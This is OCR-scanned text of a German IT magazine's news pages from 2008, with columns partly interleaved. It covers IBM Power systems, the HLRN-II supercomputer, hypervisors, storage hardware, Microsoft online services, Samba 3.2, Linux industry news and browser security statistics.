tet bis zu 4300 CPW und kostet 
als Einstiegskonfiguration mit 1 
GByte Hauptspeicher und zwei 
70-GByte-Platten in der 5- 
User-Edition knapp 13 000 Eu- 
ro. Es ist auf bis zu 16 GByte 
Hauptspeicher und 1,7 Terabyte 
Plattenplatz ausbaubar. 

Das derzeit größte Modell 
1595 skaliert auf bis zu 64 Po- 
wer5+-Prozessoren - von 
31 500 auf bis zu 216 000 


legt im PC zwei (PCle-)Steck- 
plätze und saugt maximal 
225 W aus dem Rechnernetz- 
teil. Beide beherrschen IEEE- 
754-konforme Gleitkomma- 
arithmetik mit doppelter 
Genauigkeit; allerdings dürf- 
ten die Performance-Angaben 


CPW Rechnerleistung. Es kann 
bis zu 2 TByte RAM und bis 
zu 381 TByte Plattenspeicher 
nutzen. 

Sozusagen als Geburtstags- 
geschenk bekommt System i als 
Herz IBMs Power6-CPUs und 
gewinnt neue Freiheiten. Das 
Betriebssystem, einst unter OS/ 
400 geführt, zwischenzeitlich 
15/0S genannt und heute 
schlicht „i‘“, läuft auch auf ei- 
nem System p, dem Nachfolger 
der 1990 angekündigten Unix- 
Server RS/6000 und nun mit 
dem System i in der Ver- 
schmelzung zum Power Sys- 
tems befindlich. Für beide 
— großteils noch getrennte — 
Architekturen steht außerdem 
Linux und AIX zur Wahl. 

Frank Soltis, Chefentwickler 
bei IBM in Rochester und geis- 
tiger „Vater“ der AS/400, be- 
dauerte im Gespräch mit iX 
keineswegs das Aufgehen „sei- 
ner“ Hardwareplattform in die 
Power-Systeme. Er sieht dar- 
in ihre Weiterentwicklung: 
„Das Betriebssystem bildet als 
Schnittstelle zwischen Hard- 
ware und Anwendungen den 
Schlüssel für den Markterfolg 
einer Plattform“. Die Power- 
Systeme seien ein logischer 
Schritt in die Zukunft, da dar- 
auf bereits drei unterschiedli- 
che Betriebssysteme laufen. 

Ebenso wichtig sei aber auch 
das Betriebssystem i als Inte- 
grationsfaktor. Schon bei der 
Markteinführung der AS/400 
habe es unter Beweis gestellt, 
dass es andere Welten (damals 
das S/36-Betriebssystem SSP) 
integrieren kann. 1998 sei dann 
mit der PASE-Umgebung auch 
Unix eingebettet worden, später 
auch noch das Open-Source- 
Quartett Linux, Apache, 
MySQL und PHP (LAMP). In 
der neuen Middleware Po- 
werVM (vorher Hypervisor) 
seien viele gemeinsame Funk- 
tionen des Power-Trios i5/OS, 
AIX und Linux ausgelagert 
worden. Berthold Wesseler 


des Herstellers nur für einfa- 
che Genauigkeit gelten. Ab 
August sind die Systeme er- 
hältlich; der C1060 für 1699 
und der S1070 für 7999 US- 
Dollar. 
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Supercomputer HLRN-II in Betrieb 


Auch in der zweiten Generation 
verteilt sich der Hochleis- 
tungsrechner Norddeutschland 
HLRN-II auf die Standorte 
Hannover und Berlin. Der größ- 
te Unterschied zum HLRN-I: 
Statt IBM liefert SGI das Sys- 
tem, bestehend aus je einem Al- 
tix ICE und einem Altix XE 
1200 Cluster. Am 3. Juli hat 
der Hersteller die Berliner 
Hälfte an das Konrad-Zuse- 
Zentrum für Informationstech- 
nik Berlin (ZIB) übergeben, 
am 10. Juli folgte im Regiona- 
len Rechenzentrum für Nieder- 
sachsen (RRZN) die offizielle 
Übergabe des hannoverschen 
Teils an die Leibniz Univer- 
sität Hannover. 

Verbunden sind beide 
Standorte über ein dediziertes 
10-GBit-Glasfaserkabel, den 
sogenannten HLRN-Link. Ge- 
meinsam sollen sie alle Hoch- 
schulen und Forschungsein- 
richtungen der Länder Berlin, 
Bremen, Hamburg, Mecklen- 


burg-Vorpommern, Nieder- 
sachsen und Schleswig-Hol- 
stein über das Wissenschafts- 
netz X-WiN bedienen. 

Momentan arbeitet das 
System mit 5824 Intel-Xeon- 
Prozessorkernen sowie 15,8 
TByte Hauptspeicher und er- 
reicht eine Rechenleistung von 
70 TFlops Peak; im Endausbau 
2009 sollen 24832 Prozessor- 
kerne samt 93 TByte Arbeits- 
speicher eine Spitzenrechen- 
leistung von 312 TFlops 
erbringen — das wäre nach 
heutigem Stand Platz 5 der 
Top500. Für die Anwender- 
daten sollen dann 2,3 Petabyte 
brutto bereitstehen. Die bei- 
den Hälften HANNI und 
BERNI des HLRN-I, deren 
IBM-pSeries-690-Nodes mit 
1024 Prozessoren 5,2 TFlops 
Peak erreichten, sollen Mitte 
September abgeschaltet wer- 
den. Ihre Nachfolger werden 
die Namen HICE und BICE 
tragen. 


Erste Reihe: Bislang finden 
die Rechenknoten in 10 
Schränken Unterschlupf. In 
zweiter Reihe hüten die 
Storage-Knoten die 
Anwenderdaten (Abb. 1). 


Zwei neue Embedded-Hypervisoren 


Neue Wege geht Red Hat mit 
seiner Virtualisierungsplattform 
„oVirt“. Der Embedded-Hyper- 
visor basiert nicht mehr wie das 
hauseigene Enterprise-Linux 
(RHEL) auf Xen, sondern auf 
KVM. Die Kernel-based Vir- 
tual Machine bedient sich der 
Hardware-Virtualisierungsfunk- 
tionen von Intels und AMDs 
Prozessoren — mittlerweile ar- 
beiten die Entwickler auch am 
Support für Itanium-, Po- 
werPC- und s390-CPUs - und 
ist seit Beginn letzten Jahres 
Bestandteil des offiziellen Li- 
nux-Kernels. Eine passende 
Managementsoftware hat Red 
Hat entwickelt. Dabei diente die 
Bibliothek libvirt als Grundlage 
(www .libvirt.org). Die aktuelle 
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Betaversion 0.91-1 des Virtua- 
lisierers steht unter www .ovirt. 
org zum Download bereit. 

Einen eigenen Hypervisor 
für Embedded-Systeme hat 
Wind River entwickelt. Er ist 
vor allem für Consumer- und 
Netzwerkgeräte konzipiert und 
unterstützt unter anderem 
VxWorks sowie Wind Rivers 
eigene Linux-Distribution als 
Gäste. Mit der auf Eclipse ba- 
sierenden Wind River Work- 
bench hat der Anbieter auch 
gleich die passende Entwick- 
lungsumgebung im Programm. 
Ab August sollen Geräteher- 
steller den Hypervisor zum Be- 
ta-Test erhalten. 
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Storage 


Neues Datacenter-Bandlaufwerk von IBM 


IBM hat die dritte Generation 
seines 3592-Bandlaufwerks 
vorgestellt. Das neue Modell 
TS 1130 liest und schreibt mit 
160 MByte/s und bringt 
1 TByte auf einer Kassette un- 
ter. Bänder des Vorgängers 
TS 1120 kann es lesen und 
schreiben, Kassetten der ersten 
Generation nur lesen. 

Auf revolutionäre neue Fea- 
tures hat der Hersteller ver- 
zichtet — schon der Vorgänger 
konnte WORM-Bänder lesen 
und schreiben sowie Daten mit 
AES (256 Bit) verschlüsseln. 
Stattdessen konzentrierte sich 
IBM auf die Modellpflege: Ein 


empfindlicherer GMR-Lese- 
kopf (Giant Magnetoresistive) 
verbessert die Leseeigenschaf- 
ten; daraus resultieren weniger 
Lesefehler und eine höhere 
Datenintegrität. Eine neue 
Kopfbeschichtung verlängert 
die Lebensdauer von Kopf 
und Band. 

Ab dem 5. September sollen 
die Laufwerke zum Einstiegs- 
preis von 39 050 US-Dollar 
(Listenpreis) erhältlich sein. 
Wer ältere 3592-Modelle erset- 
zen will, zahlt pro Stück 
19 500 Dollar. 
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IBMs neues Bandlaufwerk TS 1130 liest und schreibt 1-TByte- 
Kassetten mit 160 MByte/s. 


Onstor lässt den Puma auf Netapp los 


Mit dem Wachstum unstruktu- 
rierter Daten erweitern die 
Speicheranbieter ihr Angebot 
spezieller Systeme, die die Da- 
teiflut bändigen sollen. So auch 
Onstor mit der neuesten Gene- 
ration seiner NAS-Gateways: 
„Cougar“ (Puma) ergänzt die 
„Bobcat“-Modelle (Wildkatze) 
nach oben hin, was sich in ei- 
ner Fülle von Erweiterungen 
niederschlägt: Skalierbarkeit 
auf vier statt einem Petabyte, 
18 statt sechs Processing Cores 
oder bis zu 16 GByte Cache 
statt 8 bei Bobcat. Laut On- 
stor-CEO Bob Miller will man 
durch das verbesserte Preis- 
Leistungs-Verhältnis vor allem 
Netapp im Highend Konkur- 
renz machen. Bei Fujitsu USA 
konnte Onstor Netapp bereits 
aus dem Partnervertrieb ver- 
drängen. 
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Acht der vom Hersteller „Fi- 
ler“ genannten Geräte lassen 
sich zu einem Hochverfügbar- 
keits-Cluster zusammenschlie- 
ßen, der bis zu 32 virtuelle 
Server bereitstellt. Acht Giga- 
bit-Ethernet-Ports pro Knoten 
stellen die Verbindung zu Win- 
dows-, Linux/Unix- und OS- 
X-Systemen her. Ins 4 GBit/s 
schnelle Fibre-Channel-Back- 
end — ebenfalls mit acht Ports 
pro Knoten - lassen sich Stor- 
age-Arrays beliebiger Herstel- 
ler integrieren. Laut Miller um- 
fasst die Liste erfasster Geräte, 
darunter auch nichtlizenzierte, 
über 30 verschiedene Anbie- 
ter. Die Preise beginnen bei 
122 500 US-Dollar für einen 
Knoten inklusive Manage- 
mentsoftware. Hartmut Wiehr 
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Seagate bringt 1,5-TByte-Festplatte 


Im August steht der nächste 
Kapazitätssprung bei Festplat- 
ten an, und er fällt nicht eben 
klein aus: Seagate erhöht die 
Kapazität seiner Barracuda 
7200.11 (SATA, 7200 U/min) 
um 50 % auf 1,5 TByte. Die 
Festplatte besitzt weiterhin vier 
Scheiben (Platters), bringt also 
auf jeder Scheibe 375 GByte 
unter. Bei den Modellen mit 
1000 und 750 GByte könnte 
der Hersteller demnach künftig 
eine Scheibe einsparen, was 
vor allem dem Stromverbrauch 
der Laufwerke entgegenkäme. 

Außerdem kündigte Seagate 
fürs vierte Quartal die Note- 
book-Festplatten Momentus 


5400.6 und 7200.4 mit 5400 
respektive 7200 U/min sowie 
einer Kapazität von 500 GByte 
an. Preise für die neuen Modelle 
nannte der Hersteller noch nicht. 

Unterdessen hat Hitachi den 
Stromverbrauch seiner Tera- 
byte-Festplatten reduziert. Die 
Deskstar 7K1000.B besitzt statt 
fünf nur noch drei Scheiben 
und soll 43 % weniger Strom 
aufnehmen: 5,5 W im Leerlauf 
(idle). Sowohl die Desktop-Va- 
riante als auch die für den Dau- 
erbetrieb konzipierte E7TK1000 
sollen noch im Juli auf den 
Markt kommen. 
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Dells Storage-Ökonomie 


Was sich hinter der letztes Jahr 
getätigten Übernahme von 
Equallogic durch Dell - die ers- 
te größere in der Geschichte des 
Systemhauses — verbirgt, erläu- 
terte Praveen Asthana, Enter- 
prise Storage Director in Aus- 
tin, Mitte Juli in London. So 
wie man in der Vergangenheit 
mit Standardlösungen offensiv 
gegen Anbieter von proprietären 
und teuren Workstations vorge- 
gangen sei, wolle man nun die 
„Beonomics of Storage“ ändern, 
indem man die getrennten Netz- 
werkstrukturen in einer „United 
Fabric“ vereine und so vor al- 
lem den kleinen und mittleren 
Unternehmen (KMU) einen ein- 
fachen und billigen Zugang zu 
Storage biete. 


Der Kauf des Herstellers 
von iSCSI-RAID-Systemen sei 
der erste Schritt. Der zweite 
bestehe in der Nutzung des von 
Cisco und anderen unterstütz- 
ten Datacenter Ethernet, das 
sich die Vorteile des 10-GE- 
Standards zunutze macht. Mit 
der nächsten Generation gehör- 
ten Paketverluste und Latency 
der Vergangenheit an. Nach 
Ansicht von Dell unterstützen 
einige Anbieter Fibre Channel 
over Ethernet (FCoE) nur, weil 
sie FC künstlich am Leben hal- 
ten wollen. Einen Konflikt mit 
dem Partner und FC-Boliden 
EMEC sieht Asthana nicht, da 
es in bestimmten Storage-Um- 
gebungen Platz für beide Tech- 
niken gebe. Hartmut Wiehr 


Positionskämpfe: Netapp Innovation Berlin 


Beim ersten eigenen Anwen- 
dertreffen in Deutschland - 
eingeführt nach dem Rückzug 
von der Cebit - stellte Netapp 
zwei neue Midrange-Filer vor: 
den FAS3140 mit maximal 420 
und den FAS3170 mit bis zu 
840 TByte Kapazität. Beide 
sind als V3140 und V3170 
auch mit einer virtuellen Ma- 
schine für die Integration mit 
Fremdsystemen erhältlich. 
Außerdem präsentierte Net- 
app zwei Performance-Be- 
schleuniger: Die „Storage Ac- 
celeration Appliance“ soll die 
NFS-Zugriffsgeschwindigkeit 
erhöhen; das „Performance Ac- 
celeration Module“, eine Steck- 
karte inklusive Software für 
die eigenen Standardmaschi- 


nen, die /O-Leistung bei be- 
stimmten leseintensiven An- 
wendungen, etwa Datenbanken. 

Strategisch möchte der Her- 
steller weg vom alten Image als 
reiner NAS-Lieferant, hin zum 
Rundum-Speicheranbieter für 
Rechenzentren. Bisher haben 
die Anstrengungen jedoch we- 
nig gefruchtet: Netapp bietet 
zwar seit einiger Zeit SAN-Lö- 
sungen sowie die übergeordne- 
te Strategie „Unified Storage“ 
zur Konsolidierung unter- 
schiedlicher Speicherplattfor- 
men an, das überdurchschnitt- 
liche Wachstum von einst ist 
jedoch erstmal auf Normalmaß 


geschrumpft. Hartmut Wiehr 
Eix-ink ix0808028 
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Onlinedienste 


Microsofts Provider-Strategie 


Nach bisher wenig geglück- 
ten Versuchen strukturiert 
Microsoft seine Onlinediens- 
te neu. Noch ist in Deutsch- 
land nicht alles verfügbar, 
die neue Strategie der Red- 
monder ist aber bereits 
erkennbar. 


MSN ist nicht gerade der Ren- 
ner. Die Versuche, die eigenen 
Webauftritte einschließlich der 
Suchmaschinen durch die Über- 
nahme von Yahoo aufzupeppen, 
um endlich mit dem Online- 
angebot Geld zu verdienen und 
dem großen Konkurrenten Goo- 
gle Paroli bieten zu können, sind 
bekanntlich auch gescheitert. 
Jetzt versuchen die Microsoft- 
Strategen, abseits der Home- 
Schiene im professionellen oder 
zumindest doch im semiprofes- 
sionellen Bereich Fuß zu fas- 
sen: „Office Live“ und „Online 
Services‘ heißen die Dienste. 

Hinter Office Live verber- 
gen sich nicht, wie der Name 
vielleicht nahelegt, klassische 
Büroanwendungen ä la Goo- 
gles „Text und Tabellen“, son- 
dern gehostete Dienste zur Ver- 
knüpfung und Bereitstellung 
von Daten, die zuvor mit loka- 
ler Software erstellt, dann aber 
über Office-Live-Dienste zen- 
tral verwaltet und gehostet wer- 
den. Dass diese lokale Software 
im Idealfall MS Office 2007 
sein sollte, versteht sich bei ei- 
nem Onlinedienst von Micro- 
soft fast von selbst. 

Bei der einfachen Form „Of- 
fice Live Workspace“ bekommt 
der Anwender im Prinzip einen 
Dateiserver gestellt, wobei er 
gezielt einzelne Dateien für 
Mitbenutzer freischalten kann. 
Ziel ist es, jederzeit von jedem 
Ort über eine Website oder 
aus Microsoft-Office-Anwen- 
dungen heraus auf die Dateien 
zugreifen zu können und sich 
um Nebensächlichkeiten wie 
Virenscan und Backup nicht 
kümmern zu müssen. 

Mit „Office Live Small Busi- 
ness“ stellt Microsoft kleinen 


Unternehmen darüber hinaus 
eine Webpräsenz (einschließlich 
eines Baukastensystems aus 
Vorlagen und Modulen), einfa- 
che CRM-Funktionen, E-Mail 
und Workflows zur Verfügung. 
Die Small-Business-Variante ist 
das einzige der hier vorgestell- 
ten Produkte, das in Deutsch- 
land bereits produktiv läuft. 
Die Nutzung von Office Live 
Small Business ist kostenlos 
und beinhaltet einen frei wähl- 
baren Domain-Eintrag; ein In- 
ternetzugang muss allerdings 
vorhanden sein. 


Auch für große 
Unternehmen 


Oberhalb der Office-Live-Ver- 
sionen — die von Microsoft ge- 
hostet und vertrieben werden 
- ist der „Online Service“ ange- 
siedelt. Hier haben die Redmon- 
der den Vertrieb an Partnerfir- 
men abgegeben, nicht zuletzt, 
weil in der Regel von Spezialis- 
ten Anpassungen vorzunehmen 
sind. Unter dem Online Service 
subsumiert Microsoft fast alle 
Serveranwendungen wie Office 
Live Meeting, Exchange Ser- 
ver, Office Communications 
Server und Office Sharepoint 
Server, in der Regel als leicht 
eingeschränkte Onlineversion. 

Im Prinzip können Dienst- 
leister aus diesen gehosteten 
Servern  firmenspezifische 
Komplettlösungen stricken. 
Ausgelegt ist der Online Service 
für Unternehmen mit bis zu 
5000 Nutzern. Verfügbar hier- 
zulande ist er aber erst 2009, 
und nach Aussage des deut- 
schen Produktmanagers Günt- 
her Igl könnte das Angebot an 
Serverdiensten bis dahin auch 
noch ausgeweitet werden. 

Voraussetzung für alle Teil- 
nehmer obiger Dienste ist die 
Registrierung beim Passport- 
Nachfolger Windows Live, da 
dieser die jeweilige Authentifi- 
zierung übernimmt. 

Wolfgang Möhle 


Dienst Zielgruppe 
Office Live Workspace Wissensarbeiter 
Office Live Kleinunternehmer 
Small Business 

Online Service mittlere und 


große Unternehmen 
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Kosten Verfügbarkeit 
in Deutschland 
kA. ab Mai 2008 im Betatest 
kostenlos ab Mai 2008 im 
produktiven Einsatz 
kA. ab 2009 
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Open Source 


Samba 3.2 unter der GPLv3 freigegeben 


Mit der jetzt vorgestellten Ver- 
sion 3.2 vollzogen die Entwick- 
ler des Samba-Projekts den 
Übergang zur neuen GPLY3. 
Ein großer Teil der Verbesse- 
rungen der erstmals unter der 
Regie der neuen Release-Mana- 
gerin Karolin Seeger erfolgten 
Freigabe fand unter der Haube 
statt. So ist ein zentrales Ziel 
die Modularisierung der Soft- 
ware. In einem ersten Schritt 
lagerten die Entwickler die 
Funktionen zur Kontrolle von 
Domänenmitgliedschaften in 
die Bibliothek libnetapi aus. 
Nebeneffekt der mit der Mo- 
dularisierung einhergehenden 
Aufräumarbeiten im Code: Die 
bisherigen Beschränkungen der 
Länge von Pfad- und Dateina- 
men fielen weg. Darüber hinaus 
soll Samba 3.2 weniger Spei- 
cher als die 3.0-Serie benötigen. 

Betreiber größerer Umge- 
bungen dürfte die Cluster-Fä- 


higkeit der neuen Release in- 
teressieren. Dazu ersetzte das 
Samba-Team die interne Da- 
tenbank TDB durch die Clus- 
ter-Variante CTDB, die dann 
allerdings auf einem verteilten 
Dateisystem wie Lustre oder 
G(P)FS laufen muss. Details 
liefern die Release Notes, die 
wie der Quellcode via www. 
samba.org einzusehen sind. Die 
Göttinger Sernet GmbH - Bröt- 
chengeber von Karolin Seeger 
— stellt unter ftp.sernet.de/ 
pub/samba/ im Verzeichnis ex- 
perimental für Debian sowie di- 
verse Red-Hat- und Suse-Varia- 
tionen Binärpakete bereit. 

Kurz danach gab das Samba- 
Team das Update 3.0.31 der 
weiterhin unter der GPLv2 ste- 
henden 3.0-Familie frei. Auch 
hierfür bietet Sernet im Ver- 
zeichnis recent Binärpakete an. 


Eix-tink ix0808030 


Konsolidierung im Linux-Markt 


Xandros kauft die kalifornische 
Linux-Firma Linspire. Die Be- 
teiligten besitzen einige Ge- 
meinsamkeiten: Beide haben ih- 
re Wurzeln im Debian-Umfeld 
und sprechen mit ihren Linux- 
Distributionen klassische Win- 
dows-Anwender beziehungs- 
weise -Administratoren an. 
Produktmäßig soll sich laut 
Xandros-CEO Andreas Typal- 
dos kurzfristig nicht viel än- 
dern. Linspire werde weiter als 


Traditionsveranstaltung: Die 
GUUG (www..guug.de) wird 
den diesjährigen Linux-Kon- 
gress vom 7. bis 10. Oktober 
an der Uni Hamburg abhalten. 
Derzeit sucht das Programm- 
komitee mit einem Call for Pa- 
pers (www.linux-kongress.org/ 
2008/cfp.html) noch Beiträge 
zur Vervollständigung des je 
zwei Tage dauernden Tutorial- 
und Konferenzprogramms. 


Bauhilfe: Etwas verspätet hat 
das Team des Opensuse Build 
Service (build.opensuse.org) 
die Version 1.0 des Frame- 
works zur Verwaltung von 
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eigenständiges Unternehmen 
agieren. Die Produktlinien von 
Xandros und Linspire sowie 
das Open-Source-Projekt Free- 
spire würden wie bisher weiter- 
gepflegt. Vom mitgekauften 
Software-Shop- und -Vertei- 
lungssystem CNR erhofft sich 
Xandros die zügige Integration 
von 3rd-Party-Software in die 
eigenen Enterprise-Produkte. 
Die vergrößerte Kundenbasis 
soll dabei den Anreiz erhöhen. 


Software für diverse Linux- 
Distributionen freigegeben. 
Nicht nur Novell, das darüber 
seine Community-Distribution 
Opensuse baut, nutzt diesen 
Service, auch Open-Xchange 
generiert auf diesem Weg für 
die Community Edition seiner 
gleichnamigen Groupware die 
Pakete für Debian, Fedora 8, 
Opensuse und Ubuntu. 


OSS-Treffen: Der Fr0SCon 
e.V., die Fachhochschule 
Bonn-Rhein-Sieg und die Li- 
nux/Unix User Group Sankt 
Augustin laden am 23. und 
24. August zur dritten Aufla- 
ge der Free and Open Source 
Conference 2008 (FrOSCon, 
www .froscon.de) nach Sankt 
Augustin ein. Zu den High- 


Nicht für rote Hüt 


Herstellerbezogene Veranstal- 
tungen laufen oft Gefahr, zur 
reinen Selbstbeweihräuche- 
rung des Anbieters zu mutie- 
ren. Red Hat ist mit seinem 
diesjährigen Summit in Bos- 
ton ein guter Kompromiss 
zwischen eigenen Marketing- 
Interessen und dem Wunsch 
der Teilnehmer nach fundier- 
ten Informationen gelungen. 
Selbst die produktorientierten 
Vorträge zeichneten sich inhalt- 
lich durch ein hohes technisches 
Niveau aus. Wer sich selbst ein 
Bild machen möchte kann in 
den inzwischen unter www. 
redhat.com/promo/summit/2008 
/downloads online stehenden 
PDFs vieler Vorträge stöbern. 

Auf der Marketing-Seite 
stand eine Reihe von Produkt- 
vorstellungen respektive -ände- 
rungen. So erläuterte Red Hat 
die Anpassungen beim sieben- 
jährigen Produktzyklus. Künf- 
tig bietet man vier (statt bisher 
drei) Jahre nach Erscheinen 
einer Major-Release den soge- 
nannten Full-Support an, der 
auch die Integration neuer 
Treiber beinhaltet. Während 
der folgenden etwa ein Jahr 
dauernden Phase 2 gibt es kei- 
ne neuen Treiber, aber voll- 
ständige Updates. In den letzen 
beiden Jahren des Zyklus’ will 
man nur noch kritische Fehler 
beheben. 

Darüber hinaus präsentier- 
ten die Amerikaner die erste 
Version von Red Hat Enterprise 
Identity, Policy und Audit 


lishts des Programms gehö- 
ren neben den Keynotes von 
Minix-Vater Andrew S. Tanen- 
baum sowie PHP-Erfinder 
Rasmus Lerdorf die Themen- 
schwerpunkte „Mobile End- 
geräte“, „Geomapping“, 
„Freie Software in Schule 
und Bildung“ sowie „Open 
Source World 2020“. 


Desktop-Management: Das 
quelloffene Desktop-Manage- 
mentsystem Opsi der Mainzer 
Uib GmbH (www .uib.de) bie- 
tet über ein browsergestütztes 
GUI die Verwaltung von Soft- 
wareverteilung, Betriebssys- 
teminstallation und Inventari- 
sierung von Windows-Clients 
auf einem Linux-Server. Die 
jetzt freigegebene Version 3.3 


(IPA), die den Code des Pro- 
jekts FreeIPA (www freeipa. 
org) nutzt. Letzteres kombi- 
niert Fedora mit Red Hats Di- 
rectory Server, MIT Kerberos, 
NTP und DNS. Andere An- 
kündigungen betrafen oVirt, 
den KVM-basierten embed- 
ded Hypervisor mit Admin- 
GUI, sowie die Realtime-Li- 
nux-Variante MRGvl (siehe 
Seite 26). 

Einen weiteren Schwer- 
punkt bildete Systemmanage- 
ment. Red Hat stellte seinen 
bisher gehüteten Satellite Ser- 
ver unter die GPLv2 und über- 
führte den Code in das freie 
Projekt Spacewalk (spacewalk. 
redhat.com). Xandros (www. 
xandros.com) präsentierte ei- 
ne Variante seiner grafischen 
Management Console xMC 
zur komfortablen Verwaltung 
von RHEL-Servern. Zenoss 
(www.zenoss.com) nutzte das 
Forum, um für die neue Ver- 
sion 2.2 seiner unter Linux 
und BSD laufenden Enter- 
prise Edition die Werbetrom- 
mel zu rühren. Sie erweitert 
die gleichnamige Open-Source- 
Lösung zum Enterprise-IT- 
Infrastruktur-Monitoring um 
einige Werkzeuge sowie Sup- 
port-Optionen. 


Eix-ink ix0808030 


unterstützt mehrere Standorte 
und eignet sich dank SQL- 
Backend auch für größere Or- 
ganisationen oder für Anwen- 
dungen mit History-Funktion 
im Pflichtenheft. 


Aufklärung: Der des Mordes 
an seiner Frau angeklagte 
Open-Source-Programmierer 
Hans Reiser hat sein bisheri- 
ges Leugnen aufgegeben und 
die Polizei zur langgesuchten 
Leiche von Nina Reiser ge- 
führt. Offensichtlich hofft der 
Initiator der Linux-Dateisys- 
teme ReiserFS und Reiser4 
dank der neuen Offenheit mit 
einer milderen Strafe davon- 
zukommen. 
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World Wide Web 


Etwa zwei Drittel der Deut- 
schen sind online. Somit ist der 
Anteil der Personen mit Inter- 
netanschluss um knapp 5 % auf 
42,2 Millionen gestiegen. Dies 
ergab eine Untersuchung, in 
der 55 000 Personen über 14 
Jahren per Telefon befragt wur- 
den. 1,4 Millionen Nutzer sind 
seit der letzten Befragung hin- 
zugekommen, davon 870 000 
Frauen. An die 5 % planen 
außerdem, das Internet zu nut- 


zen, wohingegen die Offliner 
erstmals unter die 30 %-Gren- 
ze fielen. 

Aufgeholt haben nach der 
von der Initiative D21 und 
TNS Infratest durchgeführten 
Befragung außer den Frauen 
die Älteren, bei ihnen beträgt 
der Nutzer-Anteil jetzt 40,3 % 
(5 % Steigerung). Spitzenreiter 
bei den Bundesländern ist wie 
2005 Berlin (70,3 %). Meck- 
lenburg-Vorpommern, Sach- 


Verfallsdatum für Webbrowser gefordert 


637 Millionen Surfer weltweit 
nutzen das Web mit veralteten 
Versionen ihres Browsers, was 
vor allem die Sicherheit herab- 
setzt. Dies ist das Ergebnis der 
Studie „Understanding the 
Web browser threat‘“, die die 
ETH Zürich gemeinsam mit 
Google und IBM erstellt hat. 
Fußend auf den Webserver- 
Statistiken bei Google haben 
die Autoren herausgefunden, 


dass lediglich 59,1 % aller Sur- 
fer die aktuelle Hauptversion 
(Major-Version) ihres Brow- 
sers benutzen, wobei die Fire- 
fox-Anhänger mit 92,2 % beim 
FF 2 die Internet-Explorer-Be- 
nutzer beim IE 6 (52,2 %) 
deutlich übertreffen. 

Bei den kleineren Versions- 
sprüngen und Sicherheits-Pat- 
ches sieht die Lage noch 
schlechter aus. 83,3 % der Fire- 


Mehr Sicherheit und Stabilität 
sowie Verbesserungen des 
E-Mail-Clients und neue Ei- 
genschaften verspricht Opera 
mit der Version 9.5 (9.51 gleich 
nachgeschoben) des hauseige- 
nen Browsers, den die Norweger 
für Windows, Linux, FreeBSD 
und Solaris (Sparc und Intel) 
zum Download freigegeben ha- 
ben. Mit Quick Find bietet Ope- 
ra eine neue Eigenschaft, die es 


Anwendern erlaubt, beliebige 
Begriffe in die Adresszeile zu 
tippen — und Opera führt eine 
Volltextsuche der bisher be- 
suchten Seiten durch. Die Er- 
gebnisse zeigt der Browser als 
Optionen der Adresszeile an 
(siehe Abbildung). 

Operas Link bietet Surfern 
an, Bookmarks, Speed Dials 
(aus Version 9.2) und Notizen 
auf einem Opera-Server zu 


Opera browser 
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Rails-Konferenz mit Flash-Talks 


Am 9. und 10. Juni fand in 
Frankfurt zum dritten Mal 
die Deutsche Rails-Konferenz 
statt — mit über 100 Besuchern 
klein, aber wieder mit einem 
Teilnehmerzahl-Zuwachs. Die 
Beiträge deckten das gesamte 
Spektrum der Rails-Entwick- 
lung ab, vom Umgang von 
Designern mit Rails-Code und 
der Integration des Presenter- 
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Pattern in Rails über Themen 
wie Test-Best-Practices, Si- 
cherheit von Rails-Anwendun- 
gen und der Integration von 
Google Gears bis hin zur Ver- 
wendung von Rails im Enter- 
prise-Kontext und verwandten 
Themen wie Messaging und 
JRuby. 

Zum ersten Mal gab es die- 
ses Jahr eine Reihe sogenann- 


sen-Anhalt und das Saarland 
(56,8 %) bilden nach wie vor 
die Schlusslichter. 

Die positive Gesamtzahl von 
65,1 % fällt allerdings hinter 
die Pläne der Bundesregierung 
von 2005 zurück, die in ihrer 
Schrift „Informationsgesell- 
schaft Deutschland 2006“ für 
Ende 2005 eine Internetnut- 
zung von 75 % gefordert hatte. 
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fox-Anwender, aber nur 47,6 % 
der IE-Nutzer hatten die je- 
weils aktuelle Minor-Version 
aufgespielt. 

Als Konsequenz fordern die 
Autoren ein Verfallsdatum für 
Browser, wie in der Lebens- 
mittelbranche üblich, sowie ei- 
nen deutlich sichtbaren Hinweis 
auf ein verfügbares Update. 
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speichern und mit den Opera- 
Instanzen auf anderen Desktops 
oder Handys zu synchronisie- 
ren. Außerdem bietet Version 
9.5 Schutz vor Phishing-Angrif- 
fen, indem sie besuchte Seiten 
mit der von Haute Secure, Net- 
craft und Phishtank betriebenen 
Datenbank „böser Betreiber“ 
abgleicht. 

Zusätzlich zum Browser hat 
Opera mit Dragonfly (dt.: Li- 
belle), das derzeit in der Alpha- 
Release 2 vorliegt, ein Analy- 
se- und Debugging-Werkzeug 
für CSS und das DOM sowie 
Javascript zur Verfügung ge- 
stellt. Dragonfly lässt sich in 
Opera integrieren oder auf der 
Kommandozeile bedienen. 
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ter Flash-Talks: extrem kurze 
Präsentationen zu Themen, mit 
denen sich die Präsentatoren 
gerade beschäftigen, eine Ein- 
richtung, die auf anderen Rails- 
Konferenzen langsam zur 
Tradition wird. Die nächste 
Konferenz ist für Mitte Juni 
2009 angekündigt, Informatio- 
nen gibt es unter www.rails- 
konferenz.de. Jan Krutisch 
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Embedded Systems 


IX- 
Veranstaltungen 


Böse Zungen behaupten, bei 
einer SAP-Einführung werde 
nicht die Software der Firma, 
sondern die Firma der Soft- 
ware angepasst. Ob das 
stimmt, soll hier nicht ent- 
schieden werden; klar ist aber, 
dass ein Umstieg von SAPs 
Business Information Ware- 
house 3.5 auf BW 7 nicht 
zwischen Tagesschau und 
Wetterkarte zu erledigen ist. 
Darum bieten wir zusammen 
mit dem dpunkt-Verlag zwei 
eintägige Intensivseminare zu 
diesem Thema in Heidelberg 
an (28.10. und 13.11.). Re- 
ferent ist der bekannte deut- 
sche SAP-Spezialist Christian 
Mehrwald, Autor des Buches 
„Datawarehousing mit SAP 
BW 7“. 


Mehr Zeit nehmen muss man 
sich für den neu aufgesetzten 
Workshop Samba - File- 
server, Printserver, Open- 
LDAP-Integration, der inner- 
halb von drei Tagen in etwa 
die Inhalte des gleichnamigen 
Tutorials in iX 3-5/08 einübt 
(24.-26.11., Düsseldorf und 
2.-4.12., München). Die Au- 
toren der Artikelreihe sind 
auch die Referenten: Karolin 
Seeger und Volker Lendecke. 
Noch im Juli zu buchen bringt 
satte 20 % Rabatt. 


200 Euro sparen kann man 
auch bei der Buchung der 
MedConf 2008 bis Ende Juli. 
Das Programm der am 24. und 
25. September in München 
stattfindenden Konferenz zum 
Thema „Software- und Sys- 
tementwurf für Medical Devi- 
